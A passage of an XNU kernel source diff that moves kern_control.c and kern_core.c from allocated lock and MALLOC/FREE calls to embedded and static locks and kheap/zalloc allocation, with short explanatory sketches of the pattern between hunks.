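	int value;
};

static TAILQ_HEAD(, example_node) example_list =
    TAILQ_HEAD_INITIALIZER(example_list);

static void
example_append(struct example_node *n)
{
	/* the head is valid from first use; no runtime TAILQ_INIT() is required */
	TAILQ_INSERT_TAIL(&example_list, n, link);
}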
index dec9a91a9359075cff4eb537ee26f0d236738417..1ee265e3d4294cbb4fb4c86fe7dd14c7b9a8c5d3 100644 (file)
@@ -96,7 +96,7 @@ enum ctl_status {
 
 struct ctl_cb {
        TAILQ_ENTRY(ctl_cb)     next;           /* controller chain */
-       lck_mtx_t               *mtx;
+       lck_mtx_t               mtx;
        struct socket           *so;            /* controlling socket */
        struct kctl             *kctl;          /* back pointer to controller */
        void                    *userdata;
@@ -129,13 +129,12 @@ struct ctl_cb {
  */
 
 const u_int32_t         ctl_maxunit = 65536;
-static lck_grp_attr_t   *ctl_lck_grp_attr = 0;
-static lck_attr_t       *ctl_lck_attr = 0;
-static lck_grp_t        *ctl_lck_grp = 0;
-static lck_mtx_t        *ctl_mtx;
+static LCK_ATTR_DECLARE(ctl_lck_attr, 0, 0);
+static LCK_GRP_DECLARE(ctl_lck_grp, "Kernel Control Protocol");
+static LCK_MTX_DECLARE_ATTR(ctl_mtx, &ctl_lck_grp, &ctl_lck_attr);
 
 /* all the controllers are chained */
-TAILQ_HEAD(kctl_list, kctl)     ctl_head;
+TAILQ_HEAD(kctl_list, kctl) ctl_head = TAILQ_HEAD_INITIALIZER(ctl_head);
 
 static int ctl_attach(struct socket *, int, struct proc *);
 static int ctl_detach(struct socket *);
@@ -271,32 +270,6 @@ kern_control_init(struct domain *dp)
        VERIFY(!(dp->dom_flags & DOM_INITIALIZED));
        VERIFY(dp == systemdomain);
 
-       ctl_lck_grp_attr = lck_grp_attr_alloc_init();
-       if (ctl_lck_grp_attr == NULL) {
-               panic("%s: lck_grp_attr_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-
-       ctl_lck_grp = lck_grp_alloc_init("Kernel Control Protocol",
-           ctl_lck_grp_attr);
-       if (ctl_lck_grp == NULL) {
-               panic("%s: lck_grp_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-
-       ctl_lck_attr = lck_attr_alloc_init();
-       if (ctl_lck_attr == NULL) {
-               panic("%s: lck_attr_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-
-       ctl_mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr);
-       if (ctl_mtx == NULL) {
-               panic("%s: lck_mtx_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-       TAILQ_INIT(&ctl_head);
-
        for (i = 0, pr = &kctlsw[0]; i < kctl_proto_count; i++, pr++) {
                net_add_proto(pr, dp, 1);
        }
@@ -306,10 +279,8 @@ static void
 kcb_delete(struct ctl_cb *kcb)
 {
        if (kcb != 0) {
-               if (kcb->mtx != 0) {
-                       lck_mtx_free(kcb->mtx, ctl_lck_grp);
-               }
-               FREE(kcb, M_TEMP);
+               lck_mtx_destroy(&kcb->mtx, &ctl_lck_grp);
+               kheap_free(KHEAP_DEFAULT, kcb, sizeof(struct ctl_cb));
        }
 }
 
@@ -326,18 +297,13 @@ ctl_attach(struct socket *so, int proto, struct proc *p)
        int error = 0;
        struct ctl_cb                   *kcb = 0;
 
-       MALLOC(kcb, struct ctl_cb *, sizeof(struct ctl_cb), M_TEMP, M_WAITOK);
+       kcb = kheap_alloc(KHEAP_DEFAULT, sizeof(struct ctl_cb), Z_WAITOK | Z_ZERO);
        if (kcb == NULL) {
                error = ENOMEM;
                goto quit;
        }
-       bzero(kcb, sizeof(struct ctl_cb));
 
-       kcb->mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr);
-       if (kcb->mtx == NULL) {
-               error = ENOMEM;
-               goto quit;
-       }
+       lck_mtx_init(&kcb->mtx, &ctl_lck_grp, &ctl_lck_attr);
        kcb->so = so;
        so->so_pcb = (caddr_t)kcb;
 
@@ -359,11 +325,11 @@ ctl_sofreelastref(struct socket *so)
        if (kcb != 0) {
                struct kctl             *kctl;
                if ((kctl = kcb->kctl) != 0) {
-                       lck_mtx_lock(ctl_mtx);
+                       lck_mtx_lock(&ctl_mtx);
                        TAILQ_REMOVE(&kctl->kcb_head, kcb, next);
                        kctlstat.kcs_pcbcount--;
                        kctlstat.kcs_gencnt++;
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                }
                kcb_delete(kcb);
        }
@@ -474,10 +440,10 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
 
        bcopy(nam, &sa, sizeof(struct sockaddr_ctl));
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        kctl = ctl_find_by_id_unit(sa.sc_id, sa.sc_unit);
        if (kctl == NULL) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return ENOENT;
        }
 
@@ -485,30 +451,30 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
            (so->so_type != SOCK_STREAM)) ||
            (!(kctl->flags & CTL_FLAG_REG_SOCK_STREAM) &&
            (so->so_type != SOCK_DGRAM))) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return EPROTOTYPE;
        }
 
        if (kctl->flags & CTL_FLAG_PRIVILEGED) {
                if (p == 0) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EINVAL;
                }
                if (kauth_cred_issuser(kauth_cred_get()) == 0) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EPERM;
                }
        }
 
        if ((kctl->flags & CTL_FLAG_REG_ID_UNIT) || sa.sc_unit != 0) {
                if (kcb_find(kctl, sa.sc_unit) != NULL) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EBUSY;
                }
        } else if (kctl->setup != NULL) {
                error = (*kctl->setup)(&sa.sc_unit, &kcb->userdata);
                if (error != 0) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return error;
                }
        } else {
@@ -527,7 +493,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
                }
 
                if (unit == ctl_maxunit) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EBUSY;
                }
 
@@ -544,7 +510,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
        kctlstat.kcs_pcbcount++;
        kctlstat.kcs_gencnt++;
        kctlstat.kcs_connections++;
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        /*
         * rdar://15526688: Limit the send and receive sizes to sb_max
@@ -580,14 +546,14 @@ done:
 #if DEVELOPMENT || DEBUG
                kcb->status = KCTL_DISCONNECTED;
 #endif /* DEVELOPMENT || DEBUG */
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                TAILQ_REMOVE(&kctl->kcb_head, kcb, next);
                kcb->kctl = NULL;
                kcb->sac.sc_unit = 0;
                kctlstat.kcs_pcbcount--;
                kctlstat.kcs_gencnt++;
                kctlstat.kcs_conn_fail++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
        }
        return error;
 }
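
The hunks above replace the heap-allocated per-socket mutex (lck_mtx_alloc_init) with a mutex embedded in struct ctl_cb and a statically declared ctl_mtx, so every lock and unlock now takes the address of the object instead of dereferencing a pointer. A minimal sketch of that pattern, using hypothetical names (demo_pcb, demo_lck_grp, demo_attach) rather than the kern_control.c symbols:

    #include <kern/locks.h>

    /*
     * Sketch only: the lock lives inside the control block and the group
     * is declared statically, so there is no lck_mtx_alloc_init() that can
     * fail and no separate lck_mtx_free() on teardown.
     */
    static LCK_GRP_DECLARE(demo_lck_grp, "demo");

    struct demo_pcb {
        lck_mtx_t   mtx;        /* embedded lck_mtx_t, not a pointer */
        void        *owner;
    };

    static void
    demo_attach(struct demo_pcb *pcb, void *owner)
    {
        /* was: pcb->mtx = lck_mtx_alloc_init(grp, attr), plus a NULL check */
        lck_mtx_init(&pcb->mtx, &demo_lck_grp, LCK_ATTR_NULL);
        pcb->owner = owner;
    }

    static void
    demo_detach(struct demo_pcb *pcb)
    {
        lck_mtx_destroy(&pcb->mtx, &demo_lck_grp);
    }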
@@ -692,14 +658,14 @@ end:
 #if DEVELOPMENT || DEBUG
                kcb->status = KCTL_DISCONNECTED;
 #endif /* DEVELOPMENT || DEBUG */
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                TAILQ_REMOVE(&kcb->kctl->kcb_head, kcb, next);
                kcb->kctl = NULL;
                kcb->sac.sc_unit = 0;
                kctlstat.kcs_pcbcount--;
                kctlstat.kcs_gencnt++;
                kctlstat.kcs_conn_fail++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
        }
 out:
        ctl_kcb_done_clearing(kcb);
@@ -731,16 +697,16 @@ ctl_disconnect(struct socket *so)
 #endif /* DEVELOPMENT || DEBUG */
 
                socket_unlock(so, 0);
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                kcb->kctl = 0;
                kcb->sac.sc_unit = 0;
                while (kcb->usecount != 0) {
-                       msleep(&kcb->usecount, ctl_mtx, 0, "kcb->usecount", 0);
+                       msleep(&kcb->usecount, &ctl_mtx, 0, "kcb->usecount", 0);
                }
                TAILQ_REMOVE(&kctl->kcb_head, kcb, next);
                kctlstat.kcs_pcbcount--;
                kctlstat.kcs_gencnt++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                socket_lock(so, 0);
                ctl_kcb_done_clearing(kcb);
                ctl_kcb_decrement_use_count(kcb);
@@ -1361,6 +1327,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
        struct kctl     *kctl;
        int     error = 0;
        void    *data = NULL;
+       size_t  data_len = 0;
        size_t  len;
 
        if (sopt->sopt_level != SYSPROTO_CONTROL) {
@@ -1385,9 +1352,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                        goto out;
                }
                if (sopt->sopt_valsize != 0) {
-                       MALLOC(data, void *, sopt->sopt_valsize, M_TEMP,
-                           M_WAITOK | M_ZERO);
+                       data_len = sopt->sopt_valsize;
+                       data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO);
                        if (data == NULL) {
+                               data_len = 0;
                                error = ENOMEM;
                                goto out;
                        }
@@ -1402,9 +1370,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                        socket_lock(so, 0);
                }
 
-               if (data != NULL) {
-                       FREE(data, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, data, data_len);
                break;
 
        case SOPT_GET:
@@ -1414,9 +1380,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                }
 
                if (sopt->sopt_valsize && sopt->sopt_val) {
-                       MALLOC(data, void *, sopt->sopt_valsize, M_TEMP,
-                           M_WAITOK | M_ZERO);
+                       data_len = sopt->sopt_valsize;
+                       data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO);
                        if (data == NULL) {
+                               data_len = 0;
                                error = ENOMEM;
                                goto out;
                        }
@@ -1449,9 +1416,8 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                                }
                        }
                }
-               if (data != NULL) {
-                       FREE(data, M_TEMP);
-               }
+
+               kheap_free(KHEAP_TEMP, data, data_len);
                break;
        }
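
Both the SOPT_SET and SOPT_GET paths above switch from MALLOC/FREE on M_TEMP to kheap_alloc/kheap_free on KHEAP_TEMP. kheap_free() needs the original allocation size, which is why the new data_len variable tracks every allocation, and the unconditional kheap_free() call shows the commit relying on it accepting a NULL pointer (data stays NULL when sopt_valsize is 0). A sketch of the same pattern with a hypothetical helper, copy_option_in(), which is not part of the commit:

    /*
     * Sketch: the caller must remember the size it passed to kheap_alloc()
     * so it can hand the same size back to kheap_free().
     */
    static int
    copy_option_in(struct sockopt *sopt, void **datap, size_t *lenp)
    {
        void    *data;
        size_t  len = sopt->sopt_valsize;
        int     error;

        if (len == 0) {
            return EINVAL;
        }
        data = kheap_alloc(KHEAP_TEMP, len, Z_WAITOK | Z_ZERO);
        if (data == NULL) {
            return ENOMEM;
        }
        error = sooptcopyin(sopt, data, len, len);
        if (error != 0) {
            kheap_free(KHEAP_TEMP, data, len);
            return error;
        }
        *datap = data;
        *lenp = len;            /* pass this back to kheap_free() later */
        return 0;
    }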
 
@@ -1473,10 +1439,10 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data,
                struct kctl     *kctl;
                u_int32_t n = 0;
 
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                TAILQ_FOREACH(kctl, &ctl_head, next)
                n++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
 
                bcopy(&n, data, sizeof(n));
                error = 0;
@@ -1494,9 +1460,9 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data,
                        error = EINVAL;
                        break;
                }
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                kctl = ctl_find_by_name(ctl_info.ctl_name);
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                if (kctl == 0) {
                        error = ENOENT;
                        break;
@@ -1514,19 +1480,19 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data,
 }
 
 static void
-kctl_tbl_grow()
+kctl_tbl_grow(void)
 {
        struct kctl **new_table;
        uintptr_t new_size;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (kctl_tbl_growing) {
                /* Another thread is allocating */
                kctl_tbl_growing_waiting++;
 
                do {
-                       (void) msleep((caddr_t) &kctl_tbl_growing, ctl_mtx,
+                       (void) msleep((caddr_t) &kctl_tbl_growing, &ctl_mtx,
                            PSOCK | PCATCH, "kctl_tbl_growing", 0);
                } while (kctl_tbl_growing);
                kctl_tbl_growing_waiting--;
@@ -1549,17 +1515,18 @@ kctl_tbl_grow()
 
        new_size = kctl_tbl_size + KCTL_TBL_INC;
 
-       lck_mtx_unlock(ctl_mtx);
-       new_table = _MALLOC(sizeof(struct kctl *) * new_size,
-           M_TEMP, M_WAIT | M_ZERO);
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
+       new_table = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl *) * new_size,
+           Z_WAITOK | Z_ZERO);
+       lck_mtx_lock(&ctl_mtx);
 
        if (new_table != NULL) {
                if (kctl_table != NULL) {
                        bcopy(kctl_table, new_table,
                            kctl_tbl_size * sizeof(struct kctl *));
 
-                       _FREE(kctl_table, M_TEMP);
+                       kheap_free(KHEAP_DEFAULT, kctl_table,
+                           sizeof(struct kctl *) * kctl_tbl_size);
                }
                kctl_table = new_table;
                kctl_tbl_size = new_size;
@@ -1581,7 +1548,7 @@ kctl_make_ref(struct kctl *kctl)
 {
        uintptr_t i;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (kctl_tbl_count >= kctl_tbl_size) {
                kctl_tbl_grow();
@@ -1632,7 +1599,7 @@ kctl_delete_ref(kern_ctl_ref kctlref)
         */
        uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (i < kctl_tbl_size) {
                struct kctl *kctl = kctl_table[i];
@@ -1657,7 +1624,7 @@ kctl_from_ref(kern_ctl_ref kctlref)
        uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1;
        struct kctl *kctl = NULL;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (i >= kctl_tbl_size) {
                kctlstat.kcs_bad_kctlref++;
@@ -1695,17 +1662,16 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
                return EINVAL;
        }
 
-       MALLOC(kctl, struct kctl *, sizeof(*kctl), M_TEMP, M_WAITOK);
+       kctl = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl), Z_WAITOK | Z_ZERO);
        if (kctl == NULL) {
                return ENOMEM;
        }
-       bzero((char *)kctl, sizeof(*kctl));
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
 
        if (kctl_make_ref(kctl) == NULL) {
-               lck_mtx_unlock(ctl_mtx);
-               FREE(kctl, M_TEMP);
+               lck_mtx_unlock(&ctl_mtx);
+               kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
                return ENOMEM;
        }
 
@@ -1726,8 +1692,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
                /* Verify the same name isn't already registered */
                if (ctl_find_by_name(userkctl->ctl_name) != NULL) {
                        kctl_delete_ref(kctl->kctlref);
-                       lck_mtx_unlock(ctl_mtx);
-                       FREE(kctl, M_TEMP);
+                       lck_mtx_unlock(&ctl_mtx);
+                       kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
                        return EEXIST;
                }
 
@@ -1771,8 +1737,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
 
                if (ctl_find_by_id_unit(userkctl->ctl_id, userkctl->ctl_unit)) {
                        kctl_delete_ref(kctl->kctlref);
-                       lck_mtx_unlock(ctl_mtx);
-                       FREE(kctl, M_TEMP);
+                       lck_mtx_unlock(&ctl_mtx);
+                       kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
                        return EEXIST;
                }
                kctl->id = userkctl->ctl_id;
@@ -1826,7 +1792,7 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
        kctlstat.kcs_reg_count++;
        kctlstat.kcs_gencnt++;
 
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        *kctlref = kctl->kctlref;
 
@@ -1839,10 +1805,10 @@ ctl_deregister(void *kctlref)
 {
        struct kctl             *kctl;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        if ((kctl = kctl_from_ref(kctlref)) == NULL) {
                kctlstat.kcs_bad_kctlref++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                if (ctl_debug != 0) {
                        printf("%s invalid kctlref %p\n",
                            __func__, kctlref);
@@ -1851,7 +1817,7 @@ ctl_deregister(void *kctlref)
        }
 
        if (!TAILQ_EMPTY(&kctl->kcb_head)) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return EBUSY;
        }
 
@@ -1861,10 +1827,10 @@ ctl_deregister(void *kctlref)
        kctlstat.kcs_gencnt++;
 
        kctl_delete_ref(kctl->kctlref);
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        ctl_post_msg(KEV_CTL_DEREGISTERED, kctl->id);
-       FREE(kctl, M_TEMP);
+       kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl));
        return 0;
 }
 
@@ -1876,7 +1842,7 @@ ctl_find_by_name(const char *name)
 {
        struct kctl     *kctl;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        TAILQ_FOREACH(kctl, &ctl_head, next)
        if (strncmp(kctl->name, name, sizeof(kctl->name)) == 0) {
@@ -1892,12 +1858,12 @@ ctl_id_by_name(const char *name)
        u_int32_t       ctl_id = 0;
        struct kctl     *kctl;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        kctl = ctl_find_by_name(name);
        if (kctl) {
                ctl_id = kctl->id;
        }
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        return ctl_id;
 }
@@ -1908,7 +1874,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize)
        int             found = 0;
        struct kctl *kctl;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        TAILQ_FOREACH(kctl, &ctl_head, next) {
                if (kctl->id == id) {
                        break;
@@ -1922,7 +1888,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize)
                strlcpy(out_name, kctl->name, maxsize);
                found = 1;
        }
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        return found ? 0 : ENOENT;
 }
@@ -1936,7 +1902,7 @@ ctl_find_by_id_unit(u_int32_t id, u_int32_t unit)
 {
        struct kctl     *kctl;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        TAILQ_FOREACH(kctl, &ctl_head, next) {
                if (kctl->id == id && (kctl->flags & CTL_FLAG_REG_ID_UNIT) == 0) {
@@ -1956,7 +1922,7 @@ kcb_find(struct kctl *kctl, u_int32_t unit)
 {
        struct ctl_cb   *kcb;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        TAILQ_FOREACH(kcb, &kctl->kcb_head, next)
        if (kcb->sac.sc_unit == unit) {
@@ -1977,13 +1943,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
 
        lr_saved = __builtin_return_address(0);
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        /*
         * First validate the kctlref
         */
        if ((kctl = kctl_from_ref(kctlref)) == NULL) {
                kctlstat.kcs_bad_kctlref++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                if (ctl_debug != 0) {
                        printf("%s invalid kctlref %p\n",
                            __func__, kctlref);
@@ -1993,7 +1959,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
 
        kcb = kcb_find(kctl, unit);
        if (kcb == NULL || kcb->kctl != kctl || (so = kcb->so) == NULL) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return NULL;
        }
        /*
@@ -2003,7 +1969,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
        /*
         * Respect lock ordering: socket before ctl_mtx
         */
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        socket_lock(so, 1);
        /*
@@ -2013,13 +1979,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
        i = (so->next_lock_lr + SO_LCKDBG_MAX - 1) % SO_LCKDBG_MAX;
        so->lock_lr[i] = lr_saved;
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
 
        if ((kctl = kctl_from_ref(kctlref)) == NULL || kcb->kctl == NULL) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                socket_unlock(so, 1);
                so = NULL;
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
        } else if (kctlflags != NULL) {
                *kctlflags = kctl->flags;
        }
@@ -2029,7 +1995,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags)
                wakeup((event_t)&kcb->usecount);
        }
 
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        return so;
 }
@@ -2040,7 +2006,7 @@ ctl_post_msg(u_int32_t event_code, u_int32_t id)
        struct ctl_event_data   ctl_ev_data;
        struct kev_msg                  ev_msg;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_NOTOWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_NOTOWNED);
 
        bzero(&ev_msg, sizeof(struct kev_msg));
        ev_msg.vendor_code = KEV_VENDOR_APPLE;
@@ -2072,7 +2038,7 @@ ctl_lock(struct socket *so, int refcount, void *lr)
        }
 
        if (so->so_pcb != NULL) {
-               lck_mtx_lock(((struct ctl_cb *)so->so_pcb)->mtx);
+               lck_mtx_lock(&((struct ctl_cb *)so->so_pcb)->mtx);
        } else {
                panic("ctl_lock: so=%p NO PCB! lr=%p lrh= %s\n",
                    so, lr_saved, solockhistory_nr(so));
@@ -2111,7 +2077,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr)
        printf("ctl_unlock: so=%llx sopcb=%x lock=%llx ref=%u lr=%llx\n",
            (uint64_t)VM_KERNEL_ADDRPERM(so),
            (uint64_t)VM_KERNEL_ADDRPERM(so->so_pcb),

-           (uint64_t)VM_KERNEL_ADDRPERM(((struct ctl_cb *)so->so_pcb)->mtx),
+           (uint64_t)VM_KERNEL_ADDRPERM(&((struct ctl_cb *)so->so_pcb)->mtx),
            so->so_usecount, (uint64_t)VM_KERNEL_ADDRPERM(lr_saved));
 #endif /* (MORE_KCTLLOCK_DEBUG && (DEVELOPMENT || DEBUG)) */
        if (refcount) {
@@ -2129,7 +2095,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr)
                    solockhistory_nr(so));
                /* NOTREACHED */
        }
-       mutex_held = ((struct ctl_cb *)so->so_pcb)->mtx;
+       mutex_held = &((struct ctl_cb *)so->so_pcb)->mtx;
 
            lck_mtx_assert(mutex_held, LCK_MTX_ASSERT_OWNED);
            so->unlock_lr[so->next_unlock_lr] = lr_saved;
@@ -2154,7 +2120,7 @@ ctl_getlock(struct socket *so, int flags)
                         panic("ctl_getlock: so=%p usecount=%x lrh= %s\n",
                             so, so->so_usecount, solockhistory_nr(so));
                }
-                return kcb->mtx;
+                return &kcb->mtx;
        } else {
                 panic("ctl_getlock: so=%p NULL NO so_pcb %s\n",
                     so, solockhistory_nr(so));
@@ -2173,12 +2139,12 @@ kctl_reg_list SYSCTL_HANDLER_ARGS
         struct kctl *kctl;
         size_t item_size = ROUNDUP64(sizeof(struct xkctl_reg));
 
-        buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO);
+        buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO);
         if (buf == NULL) {
                 return ENOMEM;
        }
 
-        lck_mtx_lock(ctl_mtx);
+        lck_mtx_lock(&ctl_mtx);
 
         n = kctlstat.kcs_reg_count;
 
@@ -2262,11 +2228,9 @@ kctl_reg_list SYSCTL_HANDLER_ARGS
        }
 
 done:
-        lck_mtx_unlock(ctl_mtx);
+        lck_mtx_unlock(&ctl_mtx);
 
-        if (buf != NULL) {
-                FREE(buf, M_TEMP);
-       }
+        kheap_free(KHEAP_TEMP, buf, item_size);
 
         return error;
 }
@@ -2285,12 +2249,12 @@ kctl_pcblist SYSCTL_HANDLER_ARGS
             2 * ROUNDUP64(sizeof(struct xsockbuf_n)) +
             ROUNDUP64(sizeof(struct xsockstat_n));
 
-        buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO);
+        buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO);
         if (buf == NULL) {
                 return ENOMEM;
        }
 
-        lck_mtx_lock(ctl_mtx);
+        lck_mtx_lock(&ctl_mtx);
 
         n = kctlstat.kcs_pcbcount;
 
@@ -2378,8 +2342,9 @@ kctl_pcblist SYSCTL_HANDLER_ARGS
        }
 
 done:
-        lck_mtx_unlock(ctl_mtx);
+        lck_mtx_unlock(&ctl_mtx);
 
+        kheap_free(KHEAP_TEMP, buf, item_size);
         return error;
 }
 
@@ -2389,7 +2354,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS
 #pragma unused(oidp, arg1, arg2)
         int error = 0;
 
-        lck_mtx_lock(ctl_mtx);
+        lck_mtx_lock(&ctl_mtx);
 
         if (req->newptr != USER_ADDR_NULL) {
                 error = EPERM;
@@ -2403,7 +2368,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS
         error = SYSCTL_OUT(req, &kctlstat,
             MIN(sizeof(struct kctlstat), req->oldlen));
 done:
-        lck_mtx_unlock(ctl_mtx);
+        lck_mtx_unlock(&ctl_mtx);
         return error;
 }
 
index a4a3ee6cfef99943e09f736a8fbea47577520755..244508acd508713679ebacc0f7237b17f7ed3ddc 100644 (file)
@@ -302,7 +302,7 @@ coredump(proc_t core_proc, uint32_t reserve_mb, int coredump_flags)
 
        (void) task_suspend_internal(task);
 
-       MALLOC(alloced_name, char *, MAXPATHLEN, M_TEMP, M_NOWAIT | M_ZERO);
+       alloced_name = zalloc_flags(ZV_NAMEI, Z_NOWAIT | Z_ZERO);
 
        /* create name according to sysctl'able format string */
        /* if name creation fails, fall back to historical behaviour... */
@@ -562,7 +562,7 @@ out2:
        audit_proc_coredump(core_proc, name, error);
 #endif
        if (alloced_name != NULL) {
-               FREE(alloced_name, M_TEMP);
+               zfree(ZV_NAMEI, alloced_name);
        }
        if (error == 0) {
                error = error1;
